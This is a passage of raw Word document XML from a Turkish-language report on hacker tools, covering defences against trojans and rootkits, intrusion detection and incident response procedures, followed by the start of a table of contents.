http://packetstorm.securify.com/UNIX/penetration/rootkits adresinde bulunabilen bir çekirdek düzeyinde RootKit'dir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Truva Atları ve KökKit Savunması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>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Geleneksel Truva atlarına karşı korunmak için kullanıcı bilinci çok önemlidir. Kullanıcılar, güvenilmeyen programları indirme ve bunları çalıştırma ile ilgili riskleri anlamalıdır. Ayrıca, güvenilir olmayan kaynaklardan gelen e-postalarda çalıştırılabilir eklerin çalıştırılmasının sorunlarından haberdar olmaları gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Ek olarak, bazı geleneksel Truva atları virüsten koruma programları tarafından algılanabilir ve ortadan kaldırılabilir. Her son kullanıcı bilgisayar sistemi (ve hatta sunucuları) etkin ve güncel bir anti-virüs programına sahip olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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RootKits'e karşı savunmak için, sistem ve güvenlik yöneticileri kritik sistem dosyaları için bütünlük kontrol programlarını kullanmalıdır. Bir RootKit kurulduğunda sıkça değiştirilen çalıştırılabilir kodlardan oluşan saygın Tripwire da dahil olmak üzere çok sayıda araç bulunmaktadır. Yönetici bu hash'leri korumalı bir ortama (yazmaya karşı korumalı bir disk gibi) saklamalı ve makinedeki programların doğruluğunu korumalı hashelerle periyodik olarak kontrol etmelidir. Genellikle, bu kontrol türü makinenin hassasiyetine bağlı olarak en az haftada bir yapılır. Yönetici, bu kritik sistem dosyalarında tespit edilen değişiklikleri son yamalar ile bağdaştırmalıdır. Sistem dosyaları değiştirilmişse ve yönetici tarafından herhangi bir yama yüklenmemişse, kötü niyetli bir kullanıcı veya dış saldırgan bir RootKit kurmuş olabilir. Bir RootKit algılanırsa, tamamen kaldırılmasını sağlamanın en güvenli yolu tüm işletim sistemini ve hatta kritik uygulamaları yeniden kurmaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Ne yazık ki, çekirdek düzeyinde RootKits bütünlük kontrol programlarıyla algılanamaz, burada bütünlük denetleyicisi işin hedefi için temel çekirdeğe güvenir. Çekirdek bütünlük denetleyicisine bakıyorsa, sonuçları RootKit kurulumunu göstermez. Çekirdek düzeyindeki RootKit'e karşı en iyi savunma, yüklenebilir çekirdek modüllerini desteklemeyen monolitik bir çekirdek. Kritik sistemlerde (Internet, İnternet Web Sitesi, DNS İnternet, Posta Servisi vb.) Yöneticiler, yüklenebilir çekirdek modüllerini desteklemeden sistemleri tam çekirdek sistemlerle kurudur. Bu özellik ile, sistem bir saldırganın kök dizinini ayarlama kazanmasını ve çekirdeği gerçek zamanlı olarak yönlendirmeyi önleyecektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Genel Savunmalar: İzinsiz Giriş Tespiti ve Olay Müdahale Prosedürleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Bu bölümde açıklanan savunma stratejilerinin her biri, özel araçlar ve saldırılarla ilgilidir. Bu stratejilerin her birini kullanmaya ek olarak, kuruluşların ayrıca bir saldırı tespit edip karşılık verebilecek durumda olmaları gerekir. Bu yetenekler izinsiz giriş tespit sistemlerinin (IDS'ler) kullanılması ve olay müdahale prosedürlerinin uygulanması ile gerçekleştirilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IDS'ler ağda hırsız alarmı görevi görür. Bilinen saldırı imza veri tabanına sahip bir IDS, bir saldırının ne zaman yapılacağını belirleyebilir ve güvenlik ile sistem yönetimi personelini uyarabilir. Erken uyarı sistemleri olarak hareket eden IDS'ler, bir kuruluşun erken aşamalarında bir saldırı tespit etmesine ve yol açabilecek hasarı en aza indirmesine izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pP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Belki de IDS'lerden bile daha önemli olan, belgelenen olay müdahale prosedürleri, etkili bir güvenlik programının en kritik unsurları arasındadır. Ne yazık ki, sektördeki en iyi savunma sistemlerinde bile, motivasyonu yüksek bir saldırgan ağa nüfuz edebilir. Bu olasılığı ele almak için bir kuruluşun, kuruluşun saldırıya nasıl tepki vereceğini açıklayan önceden belirlenmiş prosedürlere sahip olması gerekir. Bu olay müdahale prosedürleri, saldırı sırasında organizasyondaki kişilerin rollerini belirtmelidir. Komuta ve yükseltme prosedürlerinin zinciri önceden yazılmalı. Krizde bu eşyaların yaratılması maliyetli hatalara yol açacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>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Gerçekten etkili olay müdahale prosedürleri, sadece bilgi teknolojisine odaklanmamalı, aynı zamanda çok disiplinli olmalıdır. Bunun yerine, Hukuk, İnsan Kaynakları, Medya İlişkileri, Bilgi Teknolojisi ve Güvenlik organizasyonlarının rolleri, sorumlulukları ve iletişim kanalları belgelenmeli ve iletilmelidir. Bu kuruluşların özel üyeleri, bir olay meydana geldiğinde bir olayı ele almak üzere bir araya getirilmek üzere bir Güvenlik Olayı Müdahale Ekibinin (SIRT) çekirdeği olarak tanımlanmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ek olarak, SIRT, ekip üyelerinin rollerinde etkili olmalarını sağlamak için olay müdahale kabiliyeti konusunda periyodik çalışmalar yapmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ek olarak, Web barındırma, masaüstü yönetimi, e-posta, veri depolama ve diğer hizmetleri kullanarak bilgi teknolojisi altyapısını dış kaynak kullanan çok sayıda kuruluşla, olay yanıt prosedürlerinin bu dış kuruluşlara uzatılması kritik öneme sahip olabilir. Dış kaynak şirketiyle yapılan sözleşme, hizmet sağlayıcının izinsiz giriş tespitinde, olay bildirimi ve olaya müdahaleye katılım konusundaki yükümlülüklerini dikkatlice belirtmelidir. Güvenlik olaylarını ele almak için özel bir servis seviyesi anlaşması ve servis şirketi personelinin bir SIRT'de bir araya getirilmesi için gereken zaman da üzerinde anlaşılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Sonuçlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu saldırı araçlarının sayısı ve gücü artmaya devam ederken, sistem yöneticileri ve güvenlik personeli ondan vazgeçmemelidir. Bu bölüm boyunca tartışılan tüm savunma stratejileri, sistemleri yönetmek için eksiksiz ve profesyonel bir iş yapmaktan kaynaklanmaktadır: sistemde neyin çalıştığını bilmek, yamasını sağlamak, uygun bant genişliğinin mevcut olduğundan emin olmak, IDS'leri kullanmak ve bir Güvenlik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t xml:space="preserve">Olayı Müdahale Ekibi hazırlamak. </w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Her ne kadar bu faaliyetler kolay olmasa ve çok çaba sarf etse de, özen göstererek, bir kuruluş sistemlerini güvende tutabilir ve saldırı şansını en aza indirebilir. İzinsiz giriş tespit sistemleri ve sağlam olay müdahale prosedürleri kullanılarak, üstesinden gelinebilecek çok gelişmiş saldırılar bile, kuruluş üzerindeki etkiyi en aza indirerek keşfedilebilir. Sağlam savunma stratejileriyle etkili bir güvenlik programı oluşturarak, kritik sistemler ve bilgiler korunabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005F0942" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="002F6FE0" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="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pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7334F205" wp14:editId="5135AFF0">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="Resim 40"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Default="00E77DF4" w:rsidP="00E77DF4"/>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1.5.2-1.5.3</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Ebubekir ÇAKMAK</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30757037</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="TBal"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004D4BB4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="164602941"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="TBal"/>
          </w:pPr>
          <w:r>
            <w:t>İçindekiler</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc10010036" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Hacker Araçları ve Savunmaların Yeni Cinsi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010036 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010037" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Dağıtılmış Saldırılar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010037 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010038" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>2.1. Dağıtılmış Hizmet Reddi Saldırıları</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010038 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010039" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2. Dağıtılmış Hizmet Reddi Saldırılarına Karşı Savunma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc10010039 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc10010040" w:history="1">
            <w:r w:rsidRPr="008F6A80">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3. Dağıtılmış Şifre Kırma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
